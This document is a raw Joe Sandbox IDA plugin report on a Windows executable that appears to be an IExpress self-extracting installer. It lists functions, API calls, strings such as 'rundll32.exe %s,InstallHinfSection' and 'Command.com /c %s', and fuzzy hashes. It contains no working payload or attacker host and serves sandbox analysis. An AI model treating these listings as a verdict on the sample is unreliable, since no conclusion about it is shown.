Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
Instruction Fuzzy Hash: E9813D77A08A418AE7108B21E8503F9BBA0FB8DBACF445131DA4D83764DF3ED516C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB141684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32 ref: 00007FF6EB141838
GetFileAttributesA.KERNEL32 ref: 00007FF6EB141852
LocalAlloc.KERNEL32 ref: 00007FF6EB1418BF
GetPrivateProfileIntA.KERNEL32 ref: 00007FF6EB1418FC
GetPrivateProfileStringA.KERNEL32 ref: 00007FF6EB14193F
GetShortPathNameA.KERNEL32 ref: 00007FF6EB1419AC

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Strings

Version, xrefs: 00007FF6EB141930
.INF, xrefs: 00007FF6EB14181A
setupapi.dll, xrefs: 00007FF6EB1419BA
Command.com /c %s, xrefs: 00007FF6EB141A60
setupx.dll, xrefs: 00007FF6EB1419A5
.BAT, xrefs: 00007FF6EB141A31
Reboot, xrefs: 00007FF6EB1418EB
AdvancedINF, xrefs: 00007FF6EB141929
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00007FF6EB1419CE
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB1417B0
DefaultInstall, xrefs: 00007FF6EB1418DC

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2617288360
Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
Instruction ID: 6233aaf81b801248768737841214e3108a8d23de04b588f0033c6ba5713ae8cb
Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
Instruction Fuzzy Hash: 29E18F63A0878285EB218F20D4403F97BA1FB49BACF944135DA4D877A5DF3EE51AC705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1466C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

LocalAlloc.KERNEL32 ref: 00007FF6EB146710
lstrcmpA.KERNEL32 ref: 00007FF6EB1467AF
LocalFree.KERNEL32 ref: 00007FF6EB1467D6
LocalFree.KERNEL32 ref: 00007FF6EB14678D

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Part of subcall function 00007FF6EB147700: GetLastError.KERNEL32 ref: 00007FF6EB147704

GetTempPathA.KERNEL32 ref: 00007FF6EB146862
GetDriveTypeA.KERNEL32 ref: 00007FF6EB1468FE
GetFileAttributesA.KERNEL32 ref: 00007FF6EB14691B
GetDiskFreeSpaceA.KERNEL32 ref: 00007FF6EB146973
MulDiv.KERNEL32 ref: 00007FF6EB146996
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EB146A0A
GetFileAttributesA.KERNEL32 ref: 00007FF6EB146A2F
CreateDirectoryA.KERNEL32 ref: 00007FF6EB146A47
SetFileAttributesA.KERNEL32 ref: 00007FF6EB146A77
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EB146AE3

Part of subcall function 00007FF6EB147AC8: FindResourceA.KERNEL32 ref: 00007FF6EB147AF2
Part of subcall function 00007FF6EB147AC8: LoadResource.KERNEL32 ref: 00007FF6EB147B09
Part of subcall function 00007FF6EB147AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF6EB147B3F
Part of subcall function 00007FF6EB147AC8: FreeResource.KERNEL32 ref: 00007FF6EB147B51

Strings

Z, xrefs: 00007FF6EB1468EE
msdownld.tmp, xrefs: 00007FF6EB146A16
<None>, xrefs: 00007FF6EB1467A5
A:\, xrefs: 00007FF6EB1468AD
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB14684F
RUNPROGRAM, xrefs: 00007FF6EB1466F8, 00007FF6EB146759

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 3973824516-3855382519
Opcode ID: acf4a8d0387c060fd8bc6dec8107c4986be4209a9d62f58e242a45ca9f1f4763
Instruction ID: 6d2eee5ef7fd08dd447dc6ab02400366f2dc788fc58f2e4cadd00532f5cb6f95
Opcode Fuzzy Hash: acf4a8d0387c060fd8bc6dec8107c4986be4209a9d62f58e242a45ca9f1f4763
Instruction Fuzzy Hash: EFD16233A1868286EB209F60D4503FA77B1FB897ACF544175DA4D836A5DF3ED806C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6EB142E08
memset.MSVCRT ref: 00007FF6EB142E1C

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

CreateEventA.KERNEL32 ref: 00007FF6EB142E59
SetEvent.KERNEL32 ref: 00007FF6EB142E6F
CreateMutexA.KERNEL32 ref: 00007FF6EB142F06
GetLastError.KERNEL32 ref: 00007FF6EB142F22
FindResourceA.KERNEL32 ref: 00007FF6EB142FEE
LoadResource.KERNEL32 ref: 00007FF6EB143005

Part of subcall function 00007FF6EB143BF4: GetVersionExA.KERNEL32 ref: 00007FF6EB143C3F

#17.COMCTL32 ref: 00007FF6EB14301D
CloseHandle.KERNEL32 ref: 00007FF6EB142F88

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Strings

, xrefs: 00007FF6EB142F6F
TITLE, xrefs: 00007FF6EB142E37
EXTRACTOPT, xrefs: 00007FF6EB142E86
probe, xrefs: 00007FF6EB142E30, 00007FF6EB142F38
INSTANCECHECK, xrefs: 00007FF6EB142EE0
VERCHECK, xrefs: 00007FF6EB142FE4

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$probe
API String ID: 3100096412-2081583707
Opcode ID: d44a6890d448cf32760f8de46e65f6057fb5f3ce6e399137d7270832076e02de
Instruction ID: d5c4c31e0b3cd6dd0fc716de0d79e8632e8d11f1498936e3e367a10e4fcc8008
Opcode Fuzzy Hash: d44a6890d448cf32760f8de46e65f6057fb5f3ce6e399137d7270832076e02de
Instruction Fuzzy Hash: B6818C73A1864386FB209B21A9007F976A0AF9D7ACF504135D90DC76B1CF7EA447CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB146CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF6EB146CEE
SetCurrentDirectoryA.KERNELBASE ref: 00007FF6EB146CFD
GetDiskFreeSpaceA.KERNELBASE ref: 00007FF6EB146D6C
MulDiv.KERNEL32 ref: 00007FF6EB146D98
GetVolumeInformationA.KERNELBASE ref: 00007FF6EB146DD6
memset.MSVCRT ref: 00007FF6EB146DF4
GetLastError.KERNEL32 ref: 00007FF6EB146E04
FormatMessageA.KERNEL32 ref: 00007FF6EB146E2F
SetCurrentDirectoryA.KERNEL32 ref: 00007FF6EB146FDD

Part of subcall function 00007FF6EB144DCC: LoadStringA.USER32 ref: 00007FF6EB144E60
Part of subcall function 00007FF6EB144DCC: MessageBoxA.USER32 ref: 00007FF6EB144EA0

Part of subcall function 00007FF6EB147700: GetLastError.KERNEL32 ref: 00007FF6EB147704

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB146CBA

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 4237285672-2312194364
Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
Instruction ID: c60923023cb1ac50e613f4b04bb219d8222de178d22f898fc0b693402f340164
Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
Instruction Fuzzy Hash: CDA15F77A186418AE7208F60E4507EABBA1FB8D7ACF444175DA8D83B64CF3ED446CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB145078
Part of subcall function 00007FF6EB145050: SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
Part of subcall function 00007FF6EB145050: FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
Part of subcall function 00007FF6EB145050: LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
Part of subcall function 00007FF6EB145050: LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
Part of subcall function 00007FF6EB145050: memcpy_s.MSVCRT ref: 00007FF6EB1450EE
Part of subcall function 00007FF6EB145050: FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

FindResourceA.KERNEL32 ref: 00007FF6EB145DC0
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB143300), ref: 00007FF6EB145DD1
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB143300), ref: 00007FF6EB145DE0
GetDlgItem.USER32 ref: 00007FF6EB145E0D
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6EB143300), ref: 00007FF6EB145E1E
GetDlgItem.USER32 ref: 00007FF6EB145E36
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6EB143300), ref: 00007FF6EB145E4A
#20.CABINET ref: 00007FF6EB145EBD
#22.CABINET ref: 00007FF6EB145F03
#23.CABINET ref: 00007FF6EB145F18
FreeResource.KERNEL32 ref: 00007FF6EB145F61
SendMessageA.USER32 ref: 00007FF6EB145FC3

Strings

*MEMCAB, xrefs: 00007FF6EB145EF4
CABINET, xrefs: 00007FF6EB145D9D, 00007FF6EB145DB7

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 4109bcd207bcf5e91b0aa70acf470b2e8f73ecd23c094f0b1ea4c1a9619db982
Instruction ID: 94da09c0195a4f9c5a472042fc7abde028ac6a855bae577e5b3112c187f3fe31
Opcode Fuzzy Hash: 4109bcd207bcf5e91b0aa70acf470b2e8f73ecd23c094f0b1ea4c1a9619db982
Instruction Fuzzy Hash: 4251FB32A08B4286EB208B50E8543F57BA1FF8D7ADF844135D94D86674DF3EE506C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1430EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 00007FF6EB143167
LoadLibraryA.KERNEL32 ref: 00007FF6EB14318B
GetProcAddress.KERNEL32 ref: 00007FF6EB1431A9
DecryptFileA.ADVAPI32 ref: 00007FF6EB1431C3
FreeLibrary.KERNEL32 ref: 00007FF6EB1431CC
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EB1431FD

Part of subcall function 00007FF6EB1460A4: LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6EB143123), ref: 00007FF6EB1460C9

Strings

DecryptFileA, xrefs: 00007FF6EB14319F
advapi32.dll, xrefs: 00007FF6EB143173
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB1431BC, 00007FF6EB143273

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 3010855178-58291647
Opcode ID: c0229a945e53ed4ff218adbcd0c7c1c4a08eb69fd2f0db82a3a42b241b87e5b9
Instruction ID: adf1b8fa89c8cb9b03b1e1bf1fa03e5a974fed2de2e6aeee739f58efdbff7552
Opcode Fuzzy Hash: c0229a945e53ed4ff218adbcd0c7c1c4a08eb69fd2f0db82a3a42b241b87e5b9
Instruction Fuzzy Hash: 01712A63E0C64386FB619B21AA407F536A4EF9D7BCF404035D94DC22B1DF2EE947864A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1464E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6EB142CE1), ref: 00007FF6EB14657C
CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6EB142CE1), ref: 00007FF6EB14662F
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6EB142CE1), ref: 00007FF6EB14666F

Part of subcall function 00007FF6EB1463B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6EB142CE1), ref: 00007FF6EB146423
Part of subcall function 00007FF6EB1463B8: GetFileAttributesA.KERNELBASE ref: 00007FF6EB146432
Part of subcall function 00007FF6EB1463B8: GetTempFileNameA.KERNEL32 ref: 00007FF6EB14645B
Part of subcall function 00007FF6EB1463B8: DeleteFileA.KERNEL32 ref: 00007FF6EB146473
Part of subcall function 00007FF6EB1463B8: CreateDirectoryA.KERNEL32 ref: 00007FF6EB146484

Strings

ppc, xrefs: 00007FF6EB1465A0
i386, xrefs: 00007FF6EB1465BB
alpha, xrefs: 00007FF6EB1465A9
mips, xrefs: 00007FF6EB1465B2
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB146528, 00007FF6EB1465DF

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-186922987
Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
Instruction ID: 5fa851db6058a6720d962cf8b749827441b01a0294f675df835a4c87009f1e02
Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
Instruction Fuzzy Hash: 3F518F73A0964285FA208B65A8103F963B0AF4E7ECF584175C94DC72B5DF7EE806C60A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB14473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF6EB1447AE
WaitForSingleObject.KERNEL32 ref: 00007FF6EB1447CA
GetExitCodeProcess.KERNELBASE ref: 00007FF6EB1447E0
CloseHandle.KERNEL32 ref: 00007FF6EB144881
CloseHandle.KERNEL32 ref: 00007FF6EB144892
GetLastError.KERNEL32 ref: 00007FF6EB1448BE
FormatMessageA.KERNEL32 ref: 00007FF6EB1448EF

Strings

, xrefs: 00007FF6EB14479C

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-3916222277
Opcode ID: 3f5f51f546c323fa48780860d15a45563f40844cf4fa9993700fa3b2c3f73d12
Instruction ID: 758abb12bdaa76cfdb68d91bf8d9131641a55bdfe753e41583a699625054d349
Opcode Fuzzy Hash: 3f5f51f546c323fa48780860d15a45563f40844cf4fa9993700fa3b2c3f73d12
Instruction Fuzzy Hash: 6D5191339086828AF7608B60E4543F9B7A1FB8D76DF144135E64D866B4CF7DD446CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
libraryloadershutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00007FF6EB142C69
GetModuleHandleW.KERNEL32 ref: 00007FF6EB142C86
GetProcAddress.KERNEL32 ref: 00007FF6EB142CA1
ExitWindowsEx.USER32 ref: 00007FF6EB142D6C
CloseHandle.KERNEL32 ref: 00007FF6EB142D8B

Strings

@, xrefs: 00007FF6EB142D45
Kernel32.dll, xrefs: 00007FF6EB142C7F
HeapSetInformation, xrefs: 00007FF6EB142C97

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Handle$AddressCloseExitModuleProcVersionWindows
String ID: @$HeapSetInformation$Kernel32.dll
API String ID: 1302179841-1204263913
Opcode ID: fccb2e4e73aee3b992288d105b73f16b216c5bdca8bd9f49aec19913e28c40fc
Instruction ID: a3d8533b8760cb8ca3543b3e7001b80d5c1f6bb275e1e8bfbefa4b341cb36b08
Opcode Fuzzy Hash: fccb2e4e73aee3b992288d105b73f16b216c5bdca8bd9f49aec19913e28c40fc
Instruction Fuzzy Hash: B5315333A186428AFB745B21A4403F976A0AF9D7BCF544135C90DC32B5DF7EE486868B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB14204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE ref: 00007FF6EB1420E5
lstrcmpA.KERNEL32 ref: 00007FF6EB142144
lstrcmpA.KERNEL32 ref: 00007FF6EB142164
SetFileAttributesA.KERNEL32 ref: 00007FF6EB1421BD
DeleteFileA.KERNEL32 ref: 00007FF6EB1421CD
FindNextFileA.KERNELBASE ref: 00007FF6EB1421E1
FindClose.KERNELBASE ref: 00007FF6EB1421F8
RemoveDirectoryA.KERNELBASE ref: 00007FF6EB142207

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
Instruction ID: 8e9d359b549ec294cb9d447cc9330400ab9bd80aec29afdd3c0e7f4a32b227fd
Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
Instruction Fuzzy Hash: FD517172618B8189EB119F20D4403F97BA1FB4ABACF844171DA4E836A4DF3DD54AC346

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB145050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF6EB145078
SizeofResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB145089
FindResourceA.KERNEL32 ref: 00007FF6EB1450AF
LoadResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450C0
LockResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450CF
memcpy_s.MSVCRT ref: 00007FF6EB1450EE
FreeResource.KERNEL32(?,?,00000000,00007FF6EB142E43), ref: 00007FF6EB1450FD

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID:
API String ID: 3370778649-0
Opcode ID: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
Instruction ID: cb76723ba2b3089051220181a5fae001f5a5bf95927e39be38fcee8f6a6ebaf2
Opcode Fuzzy Hash: 3bf69dff85db5cdf34237252cc992bc602bd2b6bf5befdefafbb4c61634c3979
Instruction Fuzzy Hash: 03115E72708B41CBEB145B62A4142B9BAA0EB4EFE9F489134DE0E83B64DE3DD4428605

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB148790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF6EB14879B

